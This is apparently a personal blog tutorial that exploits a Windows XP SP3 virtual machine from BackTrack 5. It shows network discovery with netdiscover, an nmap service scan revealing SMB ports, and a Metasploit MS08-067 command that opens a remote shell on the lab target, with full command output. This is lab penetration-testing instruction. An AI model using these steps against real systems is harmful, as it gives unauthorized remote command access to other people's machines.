exploitation windows xp sp3 with SMB vuln

how exploitation windows xp sp3 use backtrack 5 R1? in my article i explore that. my windows xp sp3 installed on my virtualbox, after do everything i check communication my backtrack to windows. i try to ping os on virtualbox;

Currently scanning: 192.168.83.0/16   |   Screen View: Unique Hosts        
                                                                             
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300            
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                
 -----------------------------------------------------------------------------
 192.168.10.1    00:0c:42:e3:89:b1    03    180   Routerboard.com            
 192.168.10.246  08:00:27:a5:ad:44    01    060   CADMUS COMPUTER SYSTEMS    
 192.168.10.251  00:23:8b:e6:02:ee    01    060   Unknown vendor            
 i use netdiscover for see ip connection on my network. ip virtualbox is 192.168.10.246
i ping:

root@cupenk:~# ping 192.168.10.246
PING 192.168.10.246 (192.168.10.246) 56(84) bytes of data.
64 bytes from 192.168.10.246: icmp_seq=1 ttl=128 time=0.455 ms
64 bytes from 192.168.10.246: icmp_seq=2 ttl=128 time=0.469 ms
64 bytes from 192.168.10.246: icmp_seq=3 ttl=128 time=0.423 ms
64 bytes from 192.168.10.246: icmp_seq=4 ttl=128 time=0.483 ms
64 bytes from 192.168.10.246: icmp_seq=5 ttl=128 time=0.307 ms
^C
--- 192.168.10.246 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 0.307/0.427/0.483/0.066 ms

 yeah,, my computer has connected to windows xp on virtualbox

next step i scanning for check openport on windows,,

root@cupenk:~# nmap -T4 -A -v 192.168.10.246

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 20:32 WIT

NSE: Loaded 87 scripts for scanning.

NSE: Script Pre-scanning.

Initiating ARP Ping Scan at 20:32

Scanning 192.168.10.246 [1 port]

Completed ARP Ping Scan at 20:32, 0.06s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 20:32

Completed Parallel DNS resolution of 1 host. at 20:32, 0.08s elapsed

Initiating SYN Stealth Scan at 20:32

Scanning 192.168.10.246 [1000 ports]

Discovered open port 135/tcp on 192.168.10.246

Discovered open port 139/tcp on 192.168.10.246

Discovered open port 445/tcp on 192.168.10.246

Completed SYN Stealth Scan at 20:32, 1.24s elapsed (1000 total ports)

Initiating Service scan at 20:32

Scanning 3 services on 192.168.10.246

Completed Service scan at 20:32, 6.01s elapsed (3 services on 1 host)

Initiating OS detection (try #1) against 192.168.10.246

NSE: Script scanning 192.168.10.246.

Initiating NSE at 20:33

Completed NSE at 20:33, 0.19s elapsed

Nmap scan report for 192.168.10.246

Host is up (0.00045s latency).

Not shown: 997 closed ports

PORT    STATE SERVICE      VERSION

135/tcp open  msrpc        Microsoft Windows RPC

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

MAC Address: 08:00:27:A5:AD:44 (Cadmus Computer Systems)

Device type: general purpose

Running: Microsoft Windows XP|2003

OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003

OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=259 (Good luck!)

IP ID Sequence Generation: Incremental

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| nbstat: 

|   NetBIOS name: CUP3NK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a5:ad:44 (Cadmus Computer Systems)

|   Names

|     CUP3NK<00>           Flags: <unique><active>

|     CUP3NK<20>           Flags: <unique><active>

|     WORKGROUP<00>        Flags: <group><active>

|     WORKGROUP<1e>        Flags: <group><active>

|     WORKGROUP<1d>        Flags: <unique><active>

|_    \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>

|_smbv2-enabled: Server doesn't support SMBv2 protocol

| smb-security-mode: 

|   Account that was used for smb scripts: guest

|   User-level authentication

|   SMB Security: Challenge/response passwords supported

|_  Message signing disabled (dangerous, but default)

| smb-os-discovery: 

|   OS: Windows XP (Windows 2000 LAN Manager)

|   Computer name: cup3nk

|   NetBIOS computer name: CUP3NK

|   Workgroup: WORKGROUP

|_  System time: 2012-02-03 11:32:58 UTC-8

TRACEROUTE

HOP RTT     ADDRESS

1   0.45 ms 192.168.10.246

NSE: Script Post-scanning.

Read data files from: /usr/local/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds

           Raw packets sent: 1103 (49.230KB) | Rcvd: 1017 (41.234KB)

i try to exploitation to windows SMB with metasploit, 

root@cupenk:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.10.246 PAYLOAD=windows/shell/bind_tcp E

[*] Please wait while we load the module tree...

 ______________________________________________________________________________

|                                                                              |

|                          3Kom SuperHack II Logon                             |

|______________________________________________________________________________|

|                                                                              |

|                                                                              |

|                                                                              |

|                 User Name:          [   security    ]                        |

|                                                                              |

|                 Password:           [               ]                        |

|                                                                              |

|                                                                              |

|                                                                              |

|                                   [ OK ]                                     |

|______________________________________________________________________________|

|                                                                              |

|______________________________________________________________________________|

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]

+ -- --=[ 798 exploits - 435 auxiliary - 132 post

+ -- --=[ 246 payloads - 27 encoders - 8 nops

       =[ svn r14678 updated today (2012.02.02)

RHOST => 192.168.10.246

PAYLOAD => windows/shell/bind_tcp

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (240 bytes) to 192.168.10.246

[*] Command shell session 1 opened (192.168.10.248:47783 -> 192.168.10.246:4444) at 2012-02-02 20:54:14 +0700

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

 yupp,, i get it i still in windos command :D

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.246
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.1

C:\WINDOWS\system32>

Posted in: security, tutorial